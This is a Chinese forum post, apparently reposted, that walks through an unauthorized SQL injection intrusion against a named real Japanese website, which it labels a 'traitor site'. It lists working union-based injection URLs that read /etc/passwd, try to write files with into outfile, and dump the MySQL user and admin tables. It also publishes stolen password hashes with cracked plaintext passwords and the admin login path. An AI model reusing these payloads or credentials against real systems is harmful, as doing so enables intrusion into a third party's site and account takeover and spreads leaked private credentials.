原创 检测汉奸站全过程

xiancda

补：www.zuaa.jp测试

# j7 \+ K5 f: [4 ~+ n! P- {2 S1 b
0x01. 检测 www.zuaa.jp 收集数据


whatweb


利用NMAP扫描

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
0x02.找注入点
, G) s# n, \2 ?找注入点：http://www.zuaa.jp/php/newsdetail.php?topic_id=390
. Z# }' _1 f* T, h+ j, ]
% C3 `) w% q" C6 _- B3 B6 |
0x03.order by
# @& l/ S, M, z9 @4 T5 a             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
" K1 F  Q' C- k% W! `' H
order by 28报错，order by 27正常
; a# E* M# z& {+ M9 A
0x04.   union手动查询
2 @+ ^! @7 \( [2 A3 n$ o9 R6 Nhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
添加到 27 时正常显示
2 P: Z& N8 \. c1 r$ g3 o: q
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

4 q2 v( k. o0 |" o: b* u0x05. info:
8 E  f5 u. j; L; h, _* dhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
2 y: y- Q+ V  h6 ]# N8 U! l! h8 l( ~
user:            root@localhost
database:    openpne
0 \- i; Z2 ^2 h7 a. A% E; d) D, {" @version:      4.1.22
# Y2 U* Q  B) l! Vos:             portbld-freebsd5.4

0x06. root用户
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的（这种方法， 可以过大多数站）
3 E* g' [* `# F; m7 K) chttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

通过工具转换
+ N, d, T# }9 _; I. }. g- s. a, q
# e% ~  X0 {' f/ [& @/ J中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
! H( ?* ]. l/ n, J+ ?$ `' O
- R, p1 \4 S* m% H0 e$ ^1 v0x07. 利用 into outfile
7 Y5 z+ s$ y* E1 A  e# ]. i4 Q全部都失败
! F; D/ Y3 }' H; M6 zhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php

http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php

; v; U- o" d; ?: X- n1 O# [页面显示“MDB2 Error:syntax error”

0x08. 利用 mysql 4.1
( a3 ?- T( x; S2 `8 g猜常规表名，字段未果 工具 sqlmap
中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

3 |% ^9 i8 H% b) q, f  J6 `

0x09. 查找后台
2 Q3 Z" W7 ]2 i& X0 U" k( P利用 现有的各种 后台工具尝试都不行

0 ?2 u7 b. i: Z0x10.  MySL外联方法
从前面 nmap 收集的信息当中，可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码，然后再通过 mysql 工具外连 www.zuaa.jp 不行
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
* k3 C3 a7 }1 w% f, d8 u  P  A
4 s9 p1 a: r3 u4 D+ a这个可以在 www.cmd5.com 解密
7 j* M+ `9 `0 \: m# Y, s% H5 droot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
" n1 m; Y0 N% Q( p! _- p/ k6 Kchen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
; k9 d0 v( N5 y; e5 Dzuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
  \2 N& V# ^$ c: }) X工具外连失败，据说防火墙策略只允许特定IP外连，具体不得知
+ e- H3 ]- f1 J# T) o' d6 E
8 }$ N6 u! }- Z1 L* E" [: X
0x11. 网站突破
' ^, B9 m; ~9 A7 \1 }发现网站的源程序 openpne, google 下载 openpne 源码

2 z' a. I6 g! o7 j3 q& q! s2 ?5 t
0x12. 默认信息利用
! l& p/ u2 `' ^( F' H- x4 Rhttp://sns.zuaa.jp/?m=admin&a=page_login

( H( _# g4 O2 H. z2 u0 ^, h+ Q+ F表名 (c_admin_user) ，字段名（username,password）
) v1 Z* m* @' A9 G2 [! e/ Ghttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user

3 H* ^; r" c: K  L# Z解密
  B2 Z7 a4 [9 Z% izuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
+ y  G" r0 @! u# u: O, c0 @0 izuaajp:c0923ec5857796a393da99905008c176,          zju1897

中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持
2 }$ i% i/ X& K/ F) a
0x13. 登录后台
9 t4 K4 w( }; A7 m
: W2 ]8 n% n# s2 u4 ^

0x14. 小结
- b0 c/ B3 Z! S0 `) ?3 x4 F6 _利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 利用网站相关信息，进行突破 。
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
8 k& ~, D$ ^: C" N( y- f) G中国网络渗透测评联盟：http://www.political-security.com/ 提供技术支持

0 h. Z' G+ l2 q3 N+ [. E最后声明：本人只负责了整理上传到论坛，让大家学习，不是原作者，原作者辛苦了！

荒村狂客

哪个牛人 费的这劲 入侵的